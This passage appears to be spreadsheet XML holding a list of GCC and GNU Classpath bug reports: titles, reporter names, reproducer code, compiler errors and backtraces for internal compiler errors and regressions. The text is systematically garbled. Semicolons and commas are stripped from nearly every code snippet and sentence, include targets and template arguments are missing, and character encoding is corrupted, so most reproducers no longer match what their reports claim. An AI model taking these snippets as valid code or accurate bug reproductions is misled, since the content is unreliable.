struct test
{
        // it only works if e is declared before test()
        test() noexcept(e) {}
        static const bool e = false
}
int main() {}
It gives me error:'e' was not declared in this scope while 'e' should be visible even though it is declared after test().
It is my understanding of the standard that the expression evaluation inside noexcept should be done once all class members are parsed (cf. 9.2/2 of n3337).
$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-unknown-linux-gnu/5.1.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /build/gcc/src/gcc-5-20150519/configure --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=https://bugs.archlinux.org/ --enable-languages=cc++adafortrangoltoobjcobj-c++ --enable-shared --enable-threads=posix --enable-libmpx --with-system-zlib --with-isl --enable-__cxa_atexit --disable-libunwind-exceptions --enable-clocale=gnu --disable-libstdcxx-pch --disable-libssp --enable-gnu-unique-object --enable-linker-build-id --enable-lto --enable-plugin --enable-install-libiberty --with-linker-hash-style=gnu --enable-gnu-indirect-function --disable-multilib --disable-werror --enable-checking=release --with-default-libstdcxx-abi=c++98
Thread model: posix
gcc version 5.1.0 (GCC)</t>
  </si>
  <si>
    <t>qigopsrtv</t>
  </si>
  <si>
    <t>GCC-66190</t>
  </si>
  <si>
    <t>[5/6 Regression] ICE: tree code â€˜call_exprâ€™ is not supported in LTO streams with -fsanitize=null</t>
  </si>
  <si>
    <t>$ cat test.ii
class A {
public:
  void m_fn1(int)
}
class GrAAHairLinePathRenderer {
  ~GrAAHairLinePathRenderer()
  A onStencilPath_drawState
  virtual void m_fn2() {
    static int a
    static int 
    onStencilPath_drawState.m_fn1(b)
  }
}
GrAAHairLinePathRenderer::~GrAAHairLinePathRenderer() {}
$ g++ test.ii -flto -c -fsanitize=null
test.ii:14:56: internal compiler error: tree code â€˜call_exprâ€™ is not supported in LTO streams
 GrAAHairLinePathRenderer::~GrAAHairLinePathRenderer() {}
                                                        ^
0x678d8e lto_write_tree
	../../gcc/lto-streamer-out.c:415
0x678d8e lto_output_tree_1
	../../gcc/lto-streamer-out.c:464
0x678d8e DFS::DFS(output_block* tree_node* bool bool bool)
	../../gcc/lto-streamer-out.c:654
0xe378ce lto_output_tree(output_block* tree_node* bool bool)
	../../gcc/lto-streamer-out.c:1609
0xdbf5f5 write_global_stream
	../../gcc/lto-streamer-out.c:2397
0xdbf5f5 lto_output_decl_state_streams(output_block* lto_out_decl_state*)
	../../gcc/lto-streamer-out.c:2444
0xdbf5f5 produce_asm_for_decls()
	../../gcc/lto-streamer-out.c:2814
0xdb4004 write_lto() [clone .lto_priv.4579]
	../../gcc/passes.c:2410
0xe22b49 ipa_write_summaries_1
	../../gcc/passes.c:2471
0xe22b49 ipa_write_summaries()
	../../gcc/passes.c:2531
0xd41543 ipa_passes
	../../gcc/cgraphunit.c:2216
0xd41543 symbol_table::compile()
	../../gcc/cgraphunit.c:2312
0xd50e1d symbol_table::finalize_compilation_unit()
	../../gcc/cgraphunit.c:2461
0xdd9dc0 cp_write_global_declarations()
	../../gcc/cp/decl2.c:4755
Breakpoint 1 lto_write_tree (ob=0x1a41670 expr=0x7ffff6c41948 ref_p=false) at ../../gcc/lto-streamer-out.c:415
415			    get_tree_code_name (TREE_CODE (expr)))
(gdb) p debug_tree(expr)
 &lt;call_expr 0x7ffff6c41948
    type &lt;void_type 0x7ffff6c5d000 void VOID
        align 8 symtab 0 alias set -1 canonical type 0x7ffff6c5d000
        pointer_to_this &gt;
    side-effects tree_0 tree_3
    arg 0 &lt;addr_expr 0x7ffff6dc4540
        type 
            public unsigned DI
            size 
            unit size 
            align 64 symtab 0 alias set -1 canonical type 0x7ffff6c5d7e0&gt;
        constant
        arg 0 
            addressable used public static weak decl_5 decl_6 SI file test.ii line 9 col 16
            size 
            unit size 
            align 32 context  chain &gt;&gt;
    arg 1  constant 2&gt;
    arg 2  constant 0&gt;&gt;
$1 = void
Thanks
Martin</t>
  </si>
  <si>
    <t>GCC-1790</t>
  </si>
  <si>
    <t>g++ does not compile 64Bit integer features</t>
  </si>
  <si>
    <t xml:space="preserve"> I have a simple example that breaks the compiler. First of all the gcc will compile the code (below) but g++ will not.
 I have tried many permutations. But I cannot use 64bit integers.
----------- code snippet  ------------------------
#include 
/* Cannot use INT64_MIN or INT64_MAX as these
   are undefined when the g++ compiler is run. Even
   thought its clear it should be defined if __cplusplus
   is defined (see stdint.h). Which it seems to be at
   compiler initialization. Go figure?
*/
int main()
{
  int64_t   test
  test = -(9223372036854775807)-1
  test = 9223372036854775807
  return 0
}
------------------------------------------------------
Gives error that value will not fit in test.
If test were 64bit then it would be ok. But it seems to make test a 32bit integer.
Release:
gcc 2.95
Environment:
Yellow Dog Linux fresh install
How-To-Repeat:
Under YellowDogLinux with the above code snippet named junk.c it will work. But name it junk.cpp or compile it under g++ and it will fail.</t>
  </si>
  <si>
    <t>CLASSPATH-22862</t>
  </si>
  <si>
    <t>[AWT] silly bug in Component.paramString()</t>
  </si>
  <si>
    <t>My Stacktrace:
Exception during event dispatch:
java.lang.NullPointerException
   at java.awt.Container.paramString (Container.java:1061)
   at javax.swing.JComponent.paramString (JComponent.java:1545)
   at java.awt.Component.toString (Component.java:4189)
   at java.lang.StringBuffer.append (StringBuffer.java:298)
   at javax.swing.JComponent.updateUI (JComponent.java:2223)
   at javax.swing.SwingUtilities.updateComponentTreeUI (SwingUtilities.java:614)
   at javax.swing.SwingUtilities.updateComponentTreeUI (SwingUtilities.java:610)
   at javax.swing.SwingUtilities.updateComponentTreeUI (SwingUtilities.java:610)
   at uic.widgets.MainWindow$3.run (MainWindow.java:209)
   at java.awt.event.InvocationEvent.dispatch (InvocationEvent.java:191)
   at java.awt.EventQueue.dispatchEvent (EventQueue.java:507)
   at java.awt.EventDispatchThread.run (EventDispatchThread.java:75)
Reading the paramString sourcecode (current classpath CVS) this is logical  it does a layoutMgr.getClass().getName() while it just checked several lines above that this line will only be reached if said variable IS null.</t>
  </si>
  <si>
    <t>GCC-12290</t>
  </si>
  <si>
    <t>Solaris 8/SPARC bootstrap failure: ICE in output_function_exception_table in ada/a-colire.adb</t>
  </si>
  <si>
    <t>make gnatlib-and-tools fails on Solaris 8/SPARC:
../../xgcc -B../../ -c -g -O2   -g -O2   -W -Wall -gnatpg -I. -I/vol/gnu/src/gcc/gcc-dist/gcc/ada a-colire.adb -v -save-temps
Reading specs from ../../specs
Configured with: '/vol/gnu/src/gcc/gcc-dist/configure' '--prefix=/vol/gcc '--with-local-prefix=/vol/gcc '--disable-nls
Thread model: posix
gcc version 3.4 20030915 (experimental)
 ../../gnat1 -I. -I/vol/gnu/src/gcc/gcc-dist/gcc/ada -quiet -dumpbase a-colire.adb -g -g -gnatpg -O2 -O2 -W -Wall -mcpu=v7 a-colire.adb -o a-colire.s
+===========================GNAT BUG DETECTED==============================+
| 3.4 20030915 (experimental) (sparc-sun-solaris2.8) GCC error:            |
| in output_function_exception_table at except.c:3720                     |
| Error detected at a-colire.adb:80:44                                     |
Here's a stack trace from gnat1:
#0  fancy_abort (file=0x5bbb88 /vol/gnu/src/gcc/gcc-dist/gcc/except.c 
    line=0 function=0xff158410 )
    at /vol/gnu/src/gcc/gcc-dist/gcc/diagnostic.c:577
#1  0x003039f8 in output_function_exception_table ()
    at /vol/gnu/src/gcc/gcc-dist/gcc/except.c:3720
#2  0x00491524 in rest_of_compilation (decl=0xff0d6580)
    at /vol/gnu/src/gcc/gcc-dist/gcc/toplev.c:2045
#3  0x000d7978 in end_subprog_body ()
    at /vol/gnu/src/gcc/gcc-dist/gcc/ada/utils.c:1812
#4  0x000ea2b4 in tree_transform (gnat_node=1471)
    at /vol/gnu/src/gcc/gcc-dist/gcc/ada/trans.c:2717
#5  0x000ef9b4 in gnat_to_code (gnat_node=-15364016)
    at /vol/gnu/src/gcc/gcc-dist/gcc/ada/trans.c:238
#6  0x000e432c in process_decls (gnat_decls=6323200 gnat_decls2=1471 
    gnat_end_list=0 pass1p=47072 pass2p=-4265160)
    at /vol/gnu/src/gcc/gcc-dist/gcc/ada/trans.c:4343
#7  0x000e6678 in tree_transform (gnat_node=1365)
    at /vol/gnu/src/gcc/gcc-dist/gcc/ada/sinfo.h:441
#8  0x000ef9b4 in gnat_to_code (gnat_node=-15364016)
    at /vol/gnu/src/gcc/gcc-dist/gcc/ada/trans.c:238
#9  0x000e7540 in tree_transform (gnat_node=1355)
    at /vol/gnu/src/gcc/gcc-dist/gcc/ada/sinfo.h:813
#10 0x000ef9b4 in gnat_to_code (gnat_node=-15364016)
    at /vol/gnu/src/gcc/gcc-dist/gcc/ada/trans.c:238
#11 0x002abba8 in back_end__call_back_end (mode=back_end__generate_object)
    at /vol/gnu/src/gcc/gcc-dist/gcc/ada/back_end.adb:108
#12 0x002ac90c in _ada_gnat1drv ()
    at /vol/gnu/src/gcc/gcc-dist/gcc/ada/gnat1drv.adb:573
#13 0x0048f4ac in toplev_main (argc=6668288 argv=0x65c000)
    at /vol/gnu/src/gcc/gcc-dist/gcc/toplev.c:1792
Environment:
System: SunOS padouk 5.8 Generic_108528-23 sun4u sparc SUNWSun-Fire-880
Architecture: sun4
host: sparc-sun-solaris2.8
build: sparc-sun-solaris2.8
target: sparc-sun-solaris2.8
configured with: '/vol/gnu/src/gcc/gcc-dist/configure' '--prefix=/vol/gcc '--with-local-prefix=/vol/gcc '--disable-nls
How-To-Repeat:
Bootstrap gcc as above and run make gnatlib-and-tools</t>
  </si>
  <si>
    <t>GCC-80549</t>
  </si>
  <si>
    <t>[7 Regression] wrong code at -O2 and -O3 in both 32-bit and 64-bit modes on x86_64-linux-gnu (executable does not terminate)</t>
  </si>
  <si>
    <t>$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/8.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 8.0.0 20170424 (experimental) [trunk revision 247088] (GCC) 
$ gcc-trunk -O2 small.c  timeout -s 9 10 ./a.out
Killed
$ cat small.c
char a b
int c
short d
void fn1(int p1) {
  short e = 4
  int f
  d = 0
  for ( d &lt;= 0 d++)
    e = 0
  if (e)
    goto L1
L2:
  if (p1) {
    a = 9
    for ( a ++a) {
      f = 5
      for ( f != 32 ++f)
        c = 8
    L1:
      if (b)
        goto L2
    }
  }
}
int main() {
  fn1(1)
  return 0
}
$ 
$</t>
  </si>
  <si>
    <t>CLASSPATH-17296</t>
  </si>
  <si>
    <t>BasicGraphicsUtils.drawStringUnderlineCharAt() cannot handle drawing strings in a Graphics2D object since TextLayout  is not implemented</t>
  </si>
  <si>
    <t>BasicGraphicsUtils.drawStringUnderlineCharAt() cannot handle drawing strings
properly in a Graphics2D object since TextLayout methods for text shapes aren't
implemented.</t>
  </si>
  <si>
    <t>graydon</t>
  </si>
  <si>
    <t>GCC-79108</t>
  </si>
  <si>
    <t>[7 Regression] ICE on some fortran code with -flto -Ofast</t>
  </si>
  <si>
    <t>Take the following fortran 90 code:
MODULE Errorcheck_mod
CONTAINS
SUBROUTINE Check_open(ios outputstr errortype)
character(len=*) intent(in) :: outputstr
if (ios &gt; 0 .AND. errortype == FATAL) then
  write(**) 'The value of ios was:' ios
end if
END SUBROUTINE Check_open
END MODULE Errorcheck_mod
---- CUT ----
Compile it like:
gfortran  -nostdlib -r -Ofast -flto --param ggc-min-expand=0 --param ggc-min-heapsize=0 errorcheck.f90
You get the following ICE:
lto1: internal compiler error: in ipa_get_type at ipa-prop.h:448
0x107c737 ipa_get_type
        ../../gcc/gcc/ipa-prop.h:448
0x107c737 propagate_constants_across_call
        ../../gcc/gcc/ipa-cp.c:2259
0x10810f7 propagate_constants_topo
        ../../gcc/gcc/ipa-cp.c:3170
0x10810f7 ipcp_propagate_stage
        ../../gcc/gcc/ipa-cp.c:3267
0x1082173 ipcp_driver
        ../../gcc/gcc/ipa-cp.c:4997
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
lto-wrapper: fatal error: gfortran returned 1 exit status
compilation terminated.
/usr/bin/ld: error: lto-wrapper failed
collect2: error: ld returned 1 exit status</t>
  </si>
  <si>
    <t>GCC-21736</t>
  </si>
  <si>
    <t>MessageFormat({0timemedium}) fails</t>
  </si>
  <si>
    <t>Attempting to create a MessageFormat with a time element styled as medium
raises an exception.  The error in MessageFormat.setLocale() happens because
DateFormat.DEFAULT has the same value as DateFormat.MEDIUM and the code was
obviously written with the assumption that this is not the case.</t>
  </si>
  <si>
    <t>gbenson</t>
  </si>
  <si>
    <t>GCC-40534</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/vector-4.c (test for excess errors)</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /te
st/gnu/gcc/gcc/gcc/testsuite/gcc.dg/vector-4.c    -ansi -pedantic-errors -S  -o 
vector-4.s    (timeout = 300)
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/vector-4.c:11:1: warning: alignment (16) 
for a exceeds maximum alignment for global common data.  Using 8
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/vector-4.c:11:1: warning: alignment (16) 
for b exceeds maximum alignment for global common data.  Using 8
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/vector-4.c:11:1: warning: alignment (16) 
for c exceeds maximum alignment for global common data.  Using 8
output is:
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/vector-4.c:11:1: warning: alignment (16) 
for a exceeds maximum alignment for global common data.  Using 8
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/vector-4.c:11:1: warning: alignment (16) 
for b exceeds maximum alignment for global common data.  Using 8
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/vector-4.c:11:1: warning: alignment (16) 
for c exceeds maximum alignment for global common data.  Using 8
FAIL: gcc.dg/vector-4.c (test for excess errors)
Excess errors:
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/vector-4.c:11:1: warning: alignment (16) 
for a exceeds maximum alignment for global common data.  Using 8
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/vector-4.c:11:1: warning: alignment (16) 
for b exceeds maximum alignment for global common data.  Using 8
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/vector-4.c:11:1: warning: alignment (16) 
for c exceeds maximum alignment for global common data.  Using 8</t>
  </si>
  <si>
    <t>GCC-10558</t>
  </si>
  <si>
    <t>[3.3 regression] Segfault on illegal use of template without template args</t>
  </si>
  <si>
    <t>The following invalid c++ class produces an internal compiler error in at the map.insert(std::pair) statement in c_expand_expr which is in c-common.c:3715.  
--------------------------
#include 
class test {
public:
  test(){}
  ~test(){}
  void Test()
private:
  std::multimap mMap
}
void test::Test() { mMap.insert(std::pair) }  //Illegal
----------------------------------
Output from g++:
In member function `void test::Test()':
test.cpp:13: Internal compiler error in c_expand_expr at c-common.c:  3714
This may be related to bug 3079 and 2650.  The code is clearly not legal but probably shouldn't have produced such an error.
Release:
gcc version 3.2.3 20030415 (Debian prerelease)
Environment:
Debian 2.4.17
How-To-Repeat:
invoke g++ test.cpp -o test.o</t>
  </si>
  <si>
    <t>smueller</t>
  </si>
  <si>
    <t>GCC-14349</t>
  </si>
  <si>
    <t>ICE on function pointer template parameter</t>
  </si>
  <si>
    <t>Instantiating this code (valid or not? I don't know)
8&lt;--------------------------------------------
  template 
  struct SimpleFunctionAdapter
  {
    T operator()(const T &amp;x)
    {
      return f(x)
    }
  }
8&lt;--------------------------------------------
with for example sin(complex) seems to ICE with the following message:
8&lt;--------------------------------------------
extensions/matrices.cpp:545:   instantiated from here
extensions/matrices.cpp:427: internal compiler error: in tsubst at cp/pt.c:
   6626
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
8&lt;--------------------------------------------
To reproduce the bug just use the attached file preprocessed.cxx and the
command line 
8&lt;--------------------------------------------
$ gcc preprocessed.cxx
8&lt;--------------------------------------------
This happened on a Debian gcc build namely
8&lt;--------------------------------------------
gcc (GCC) 3.3.3 20040125 (prerelease) (Debian)
8&lt;--------------------------------------------</t>
  </si>
  <si>
    <t>GCC-27000</t>
  </si>
  <si>
    <t>visibility push/pop and templates go crazy</t>
  </si>
  <si>
    <t>On the testcases below GCC marks even instantiated templates
with the currently pushed visibility in case of the first testcase
that's hidden (anonymous namespace) and in the third testcase hidden as well
(namespace with visibility attribute).
But the template really wasn't declared as hidden and making it hidden causes
serious problems (e.g. depending on which order you link the .o files from
the testcases together for _ZN1SIiEC1ERKi and _ZN1SIiED1Ev wins either
default or hidden visibility.  If it is e.g. linked into a shared library
and default visibility wins then on x86_64 it won't even link as first and
third .o files rely on the symbols being hidden.</t>
  </si>
  <si>
    <t>GCC-14544</t>
  </si>
  <si>
    <t>gcc.c-torture/execute/20040307-1.c fails on 16-bit targets</t>
  </si>
  <si>
    <t>I need this PR later on so that a fix can be ported to 3.4 and 3.3 with
release managers' permission.</t>
  </si>
  <si>
    <t>GCC-49632</t>
  </si>
  <si>
    <t>ICE in compute_affine_dependence (tree-data-ref.c:4038) with -O3</t>
  </si>
  <si>
    <t>Created attachment 24683
Output of ajo-gcc -std=c99 -w -march=athlon64 -O3 -fcheck-data-deps test.c -v
Bug 49033 and/or bug 46851 might be related.
This reproduces for me with svn revision 175547 (2011-06-30). It doesn't
reproduce with gcc 4.5.1. I'm on Ubuntu 10.10 x86-64.
cat &gt;test.c &lt;&lt;EOF
extern int g_107 g_123 l_98[7][7]
static int MUL(unsigned x unsigned y) { return x*y }
void func_95(int p) {
    for (int i = 0 i &lt; 5 ++i) {
        for (int j = 0 j &lt; 5 ++j) {
            for (g_123 = 4 g_123 &gt;= 0 --g_123) {
                l_98[0][0] = (l_98[i][j+1] != -l_98[i][0])
                           + (p * MUL(g_107 || l_98[0][1] 2*l_98[0][g_123+1]) || p)
            }
            l_98[i][j] = 0
        }
    }
}
EOF
gcc -std=c99 -w -march=athlon64 -O3 -fcheck-data-deps test.c
(Number of distance vectors differ: Banerjee has 1 Omega has 2.
Banerjee dist vectors:
  0   1 
Omega dist vectors:
  0   1 
  0  -1 
data dependence relation:
(Data Dep: 
#(Data Ref: 
#  bb: 18 
#  stmt: D.2624_83 = l_98[i_54][pretmp.10_69]
#  ref: l_98[i_54][pretmp.10_69]
#  base_object: l_98
#  Access function 0: {1 + 1}_2
#  Access function 1: {0 + 1}_1
#)
#(Data Ref: 
#  bb: 29 
#  stmt: l_98[i_54][j_55] = 0
#  ref: l_98[i_54][j_55]
#  base_object: l_98
#  Access function 0: {0 + 1}_2
#  Access function 1: {0 + 1}_1
#)
  access_fn_A: {1 + 1}_2
  access_fn_B: {0 + 1}_2
 (subscript 
  iterations_that_access_an_element_twice_in_A: [1 + 1 * x_1]
  last_conflict: 4
  iterations_that_access_an_element_twice_in_B: [0 + 1 * x_1]
  last_conflict: 4
  (Subscript distance: 1
  )
 )
  access_fn_A: {0 + 1}_1
  access_fn_B: {0 + 1}_1
 (subscript 
  iterations_that_access_an_element_twice_in_A: [0]
  last_conflict: scev_not_known
  iterations_that_access_an_element_twice_in_B: [0]
  last_conflict: scev_not_known
  (Subscript distance: 0
  )
 )
  inner loop index: 1
  loop nest: (1 2 )
  distance_vector:   0   1 
  distance_vector:   0  -1 
  direction_vector:     =    +
  direction_vector:     =    -
)
)
test.c: In function â€˜func_95â€™:
test.c:3:6: internal compiler error: in compute_affine_dependence at tree-data-ref.c:4038
This test case is reduced from the output of Csmith 2.1.0 (git hash 01aa8b04
https://github.com/Quuxplusone/csmith/) using the following command line:
csmith --no-paranoid --no-longlong --no-pointers --arrays --no-jumps --no-consts --volatiles --checksum --divs --muls --no-bitfields --packed-struct -s 1807040286</t>
  </si>
  <si>
    <t>GCC-77645</t>
  </si>
  <si>
    <t>Python xmethods tests failing</t>
  </si>
  <si>
    <t>Python Exception  Argument to arithmetic operation not a number or boolean.: 
deque.gdb:22: Error in sourced command file:
Error while executing Python code.
skipping: Python Exception  Argument to arithmetic operation not a number or boolean.: 
skipping: deque.gdb:22: Error in sourced command file:
skipping: Error while executing Python code.
UNSUPPORTED: libstdc++-xmethods/deque.cc
Python Exception  There is no member or method named _M_data.: 
list.gdb:13: Error in sourced command file:
Error while executing Python code.
skipping: Python Exception  There is no member or method named _M_data.: 
skipping: list.gdb:13: Error in sourced command file:
skipping: Error while executing Python code.
UNSUPPORTED: libstdc++-xmethods/list.cc
Python Exception  Argument to arithmetic operation not a number or boolean.: 
skipping: Python Exception  Argument to arithmetic operation not a number or boolean.: 
vector.gdb:13: Error in sourced command file:
Error while executing Python code.
skipping: vector.gdb:13: Error in sourced command file:
skipping: Error while executing Python code.
UNSUPPORTED: libstdc++-xmethods/vector.cc
The std::list failure is because the list node has a different structure in C++11 and later which is easy to fix.
The deque and vector failures are also related to C++11 but I don't understand them yet. Pointer arithmetic is failing for a pointer type maybe because the code uses a typedef that doesn't look like a pointer.</t>
  </si>
  <si>
    <t>GCC-51273</t>
  </si>
  <si>
    <t>ICE: vector VEC(inline_summary_tbase) index domain error in inline_summary at ipa-inline.h:193 with -O -fgnu-tm transaction_safe and overloaded contructor</t>
  </si>
  <si>
    <t>Created attachment 25888
reduced testcase
Compiler output:
$ gcc -O -fgnu-tm testcase.C 
testcase.C:13:1: internal compiler error: vector VEC(inline_summary_tbase) index domain error in inline_summary at ipa-inline.h:193
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r181609 - crash</t>
  </si>
  <si>
    <t>GCC-13938</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE when rounding double to long long</t>
  </si>
  <si>
    <t>The following function:
long long d2ll(double x)
{
        return (long long)(x&gt;0?(x-0.5):(x+0.5))
}
compiled using '-c -O3' options couses ICE:
stystem6.c: In function `d2ll':
stystem6.c:4: internal compiler error: in subst_stack_regs_pat at reg-stack.c:1430
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gcc -v gives:
Using built-in specs.
Configured with: ../gcc-20040130/configure --enable-languages=c
Thread model: posix
gcc version 3.5.0 20040130 (experimental)
The problem is present with version from 20040121. The problem is absent
in version from 20040120 (and in earlier versions). Note that the function
above is translation to C of GNU Pascal built-in `round' function. The
problem couses ICE during compilation of GPC `System' unit and in effect
multiple test failures.</t>
  </si>
  <si>
    <t>hebisch</t>
  </si>
  <si>
    <t>GCC-23270</t>
  </si>
  <si>
    <t>Undefined reference to module blank common variable</t>
  </si>
  <si>
    <t>! ld error - undefined reference to `__test_equiv_a'
! OK with ifc
!
module test_equiv
  common a
  real    a
end module test_equiv
program module_equiv
  use test_equiv
  a = 999.0_4
end program module_equiv
[prt@localhost mytests]# /gcc-4.1/bin/gfortran  -std=f95 module_equivalence_pr.f90
/tmp/cc0RTDPI.o(.text+0x9): In function `MAIN__':
: undefined reference to `__test_equiv__a'
collect2: ld returned 1 exit status</t>
  </si>
  <si>
    <t>GCC-11041</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] ICE: const myclass  (when operator*() defined)</t>
  </si>
  <si>
    <t xml:space="preserve">	g++-3.3 and g++-3.2 give this error message
	internal compiler error: in make_decl_rtl at varasm.c:797
	for the following code (see How-To-Repeat section).
	g++-2.95 did also:
	Internal compiler error in `expand_expr' at expr.c:5850
Environment:
System: Linux hikaru 2.4.20 #2 Fri Feb 21 01:53:29 EET 2003 i686 GNU/Linux
Architecture: i686
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++javaf77pascalobjcadatreelang --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib --enable-nls --w
ithout-included-gettext --enable-__cxa_atexit --enable-clocale=gnu --enable-debug --enable-java-gc=boehm --enable-java-awt=xlib --enable-objc-gc i386-linux
How-To-Repeat:
    Try compiling this:
	class hop
        {
        public:
            hop operator* () const
        }
        int main(void)
        {
            const hop 
        }</t>
  </si>
  <si>
    <t>bisqwit</t>
  </si>
  <si>
    <t>GCC-34014</t>
  </si>
  <si>
    <t>conversion operators misprinted in gimple dump</t>
  </si>
  <si>
    <t>In the .gimple dump of the testcase from PR33604 (http://gcc.gnu.org/bugzilla/attachment.cgi?id=14498) you can see things like this one:
      D.2136 = operator 1 (
where 1 is actually operator double.</t>
  </si>
  <si>
    <t>GCC-45027</t>
  </si>
  <si>
    <t>[4.6 Regression] FAIL: c-c++-common/dfp/pr36800.c</t>
  </si>
  <si>
    <t>On Linux/x86-64 revision 162385 gave
FAIL: c-c++-common/dfp/pr36800.c execution test
FAIL: c-c++-common/dfp/pr36800.c execution test
Revision 162382 is OK.</t>
  </si>
  <si>
    <t>GCC-46121</t>
  </si>
  <si>
    <t>[4.6 regression] LTO bootstrap failed</t>
  </si>
  <si>
    <t>On Linux/x86-64 revision 165780 failed to bootstrap with LTO:
http://gcc.gnu.org/ml/gcc-regression/2010-10/msg00249.html
Revision 165748 is OK.</t>
  </si>
  <si>
    <t>GCC-80739</t>
  </si>
  <si>
    <t>Accessing value of X through a Y glvalue in a constant expression</t>
  </si>
  <si>
    <t>Created attachment 41352
Example of the bug
Consider the following valid code in C++14 (compiles without problem under clang):
// ========================================================================== //
#include 
template  struct element {
    constexpr element() noexcept: x0(0) x1(0) x2(0) x3(0) {}
    T x0 int x1 x2 x3
}
template  struct container {
    constexpr container() noexcept: data() {data = element()}
    element data
}
template  constexpr bool test() {
    return (container() true)
}
int main() {
    constexpr bool tmp0 = test() // works
    constexpr bool tmp1 = test() // fails
    return tmp0 
}
// ========================================================================== //
Compilation fails under g++-5 (g++-5 (Ubuntu 5.4.1-2ubuntu1~16.04) 5.4.1 20160904) with the following message:
## -------------------------------------------------------------------------- ##
gcc_compiler_error.cpp: In function â€˜int main()â€™:
gcc_compiler_error.cpp:16:44:   in constexpr expansion of â€˜test()â€™
gcc_compiler_error.cpp:16:45:   in constexpr expansion of â€˜container()â€™
gcc_compiler_error.cpp:16:45: internal compiler error: unexpected expression â€˜*(container*)thisâ€™ of kind mem_ref
     constexpr bool tmp1 = test() // fails
                                             ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
## -------------------------------------------------------------------------- ##
Compilation fails under g++-6 (g++-6 (Ubuntu 6.2.0-3ubuntu11~16.04) 6.2.0 20160901) with the following message:
## -------------------------------------------------------------------------- ##
gcc_compiler_error.cpp: In function â€˜int main()â€™:
gcc_compiler_error.cpp:16:44:   in constexpr expansion of â€˜test()â€™
gcc_compiler_error.cpp:16:45:   in constexpr expansion of â€˜container()â€™
gcc_compiler_error.cpp:16:45: error: accessing value of â€˜â€™ through a â€˜char [20]â€™ glvalue in a constant expression
     constexpr bool tmp1 = test() // fails
                                             ^
## -------------------------------------------------------------------------- ##
Other versions may be affected (not tested).</t>
  </si>
  <si>
    <t>vince.rev</t>
  </si>
  <si>
    <t>GCC-41431</t>
  </si>
  <si>
    <t>&amp;main should be allowed within unevaluated operands.</t>
  </si>
  <si>
    <t>The following code snippet is wrongly rejected
int main() { sizeof( }
---
main.cpp: In function 'int main()':
main.cpp:1: warning: ISO C++ forbids taking address of function '::main'
---
But the Standard allows that within a sizeof because according to 3.2/2 it does not constitute a use of main.</t>
  </si>
  <si>
    <t>schaub.johannes</t>
  </si>
  <si>
    <t>GCC-43247</t>
  </si>
  <si>
    <t>[4.4 Regression] Incorrect optimization while declaring array[1]</t>
  </si>
  <si>
    <t>This code should print WORKS!!!! a couple of time. But with -O2 g++ optimize the condition away.
It works with -O1
Tested with gcc 4.4.3 on linux x86_64 (Archlinux)
#include 
#include 
#include 
struct QVectorTypedData
{
    int array[1]
}
int main(int  char **)
{
    QVectorTypedData *d
    d = static_cast(::malloc(sizeof(QVectorTypedData)+ (45-1) * sizeof(int)))
    memset(d-&gt;array 0 45 * sizeof(int))
    int *array = d-&gt;array
    int count = 0
    for (int i = 0 i &lt; 10 i++) {
        fprintf(stderr %d %d %d %d\n i (i&gt;=3) (i=3) 
        if (i &gt;= 3 &amp;&amp; i &lt;= 8) {
            fprintf(stderr WORKS!!!\n)
        }
        array[i] = 4
    }
    return 0
}</t>
  </si>
  <si>
    <t>ogoffart</t>
  </si>
  <si>
    <t>GCC-60773</t>
  </si>
  <si>
    <t>[4.9 Regression] FAIL: gcc.dg/vect/pr60656.c -flto -ffat-lto-objects  scan-tree-dump-times vect vectorized 1 loops 1</t>
  </si>
  <si>
    <t>configure flags: --prefix=/usr --build=powerpc64-linux --enable-checking=release --enable-shared --with-system-zlib CFLAGS='-O2 -g' CXXFLAGS='-O2 -g' --with-cpu-64=power4 --enable-secureplt --with-long-double-128
$ gcc/xgcc -Bgcc/ ../gcc/testsuite/gcc.dg/vect/pr60656.c -fno-diagnostics-show-caret -fdiagnostics-color=never -flto -ffat-lto-objects -maltivec -ftree-vectorize -fno-vect-cost-model -fno-common -O2 -fdump-tree-vect-details -lm -m64 -o ./pr60656.exe
$ grep vectorized pr60656.c.114t.vect 
../gcc/testsuite/gcc.dg/vect/pr60656.c:12:3: note: === vect_mark_stmts_to_be_vectorized ===
../gcc/testsuite/gcc.dg/vect/pr60656.c:12:3: note: not vectorized: relevant stmt not supported: P_6 = (long int) _5
../gcc/testsuite/gcc.dg/vect/pr60656.c:6:1: note: vectorized 0 loops in function.
../gcc/testsuite/gcc.dg/vect/pr60656.c:27:3: note: not vectorized: loop contains function calls or data references that cannot be analyzed
